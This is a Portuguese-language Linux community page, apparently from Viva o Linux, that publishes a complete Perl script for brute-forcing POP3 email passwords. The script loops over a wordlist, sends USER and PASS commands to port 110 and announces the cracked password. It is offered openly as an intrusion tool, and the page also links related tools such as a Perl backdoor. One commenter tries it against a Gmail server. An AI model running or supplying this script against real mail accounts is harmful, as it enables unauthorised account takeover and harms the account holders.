Brutal Force Attack

Publicado por Fábio Berbert de Paula 13/11/2002

[ Hits: 16.416 ]

Homepage: https://fabio.automatizando.dev

Download brutal.zip

0 0
Denuncie   Favoritos   Indicar  



Tenta fazer a adivinhação da senha de um usuário de email através da técnica de invasão por força bruta, ou seja, tentativa e erro. O script utiliza o módulo IO::Socket para efetuar conexão com o servidor POP.

  



Esconder código-fonte

#!/usr/bin/perl
#############################################
# brutal.pl
#
# Programa que simula um ataque brutal force 
# em servidores de email através da tentativa
# de invasão por adivinhação de senha.
#
# Programado por: Fábio Berbert de Paula
# E-mail: fabio@vivaolinux.com.br
# Web Site: www.vivaolinux.com.br
#
# Rio de Janeiro, 12 de Agosto de 2002
# ##########################################

use strict;

use IO::Socket;

if ($#ARGV != 2) {
  print "Use: \n\t$0 popserver username passwd_list\n\nOnde:\n";
  print "\tpopserver = servidor de email\n\tusername = nome do usuário\n";
  print "\tpasswd_list = arquivo com a lista de senhas que serão enviadas para teste\n\n";
  exit(0);
}

my ($server,$user,$pwfile) = @ARGV;

if (! -f $pwfile) {
   print "Erro: $pwfile não é um nome de arquivo válido!\n";
   exit;
}

# para cada senha, tente invadir
open(R,$pwfile);
while (<R>) {
  chomp;
  tryout($server,$user,$_);
}
close(R);


sub tryout {
   my ($server,$user,$passwd) = @_;
   my $state;

   print "Tentativa: $passwd ...\n";
   my $connex = new IO::Socket::INET->new(  
                  PeerAddr  => $server,
                  PeerPort  => "110",
                  Proto     => "tcp",
                  Type      => SOCK_STREAM,
                  Timeout   => "30"
   );
   
   if (!defined($connex)) {
      print "Erro ao conectar ao servidor $server ...\n";
      exit(0);
   }
   
   $state = &readsock($connex);
   $connex->send("USER $user\r\n");
   $state = &readsock($connex);
   if ($state !~ /^\+OK/) { next; }
   $connex->send("PASS $passwd\r\n");
   $state = &readsock($connex);

   if ($state =~ /^\+OK/) { 
      print "Cracked!!! A senha do usuário $user é $passwd\n";
      exit;
   }
   
   $connex -> close;
   sleep(5);
}

sub readsock {
   my ($socket) = @_;
   my $data = '';
   my $buf = '';
   while ($buf !~ /\n$/) {
      $buf=<$socket>;
      $data .= $buf;
   }
   return $data;
}

Scripts recomendados

Backdoor em perl

Script para encontrar vulnerabilidades no BIND

Multi Brute Force

Port Scan

Monitor do BO


  

Comentários
[1] Comentário enviado por iagolira em 02/01/2016 - 20:59h

$ perl brutal.pl smtp.gmail.com fulano@gmail.com list
Erro ao conectar ao servidor smtp.gmail.com ...

Estes script ainda funciona (sei que foi publicado em 2002)?


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Como atualizar sua versão estável do Debian

Cirurgia para acelerar o openSUSE em HD externo via USB

Void Server como Domain Control

Modo Simples de Baixar e Usar o bash-completion

Instalar/habilitar o Linux nativo dentro do Windows com WSL (Windows Subsystem for Linux - Subsistema do Windows para Linux)

Dicas

Script de montagem de chroot automatica

Atualizar Linux Mint 22.2 para 22.3 beta

Jogar games da Battle.net no Linux com Faugus Launcher

Como fazer a Instalação de aplicativos para acesso remoto ao Linux

Como fazer a instalação do Samba

Tópicos

Instalar Dual Boot, Linux+Windows. (5)

Conky, alerta de temperatura alta (16)

De volta para o futuro - ou melhor, para o presente (parte 2) (3)

Instalação do cosmic no archlinux (1)

resolução abaixou (3)

Top 10 do mês

Scripts

[Shell Script] Script para Teste de Rede

[Shell Script] Script que sincroniza a mensagem de cópia de pendrive com o processo real

[Python] Cadastro de Distros

[Shell Script] Pós Instalação Fedora 43+

[Shell Script] Task Manager para Terminal

A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

Site hospedado por: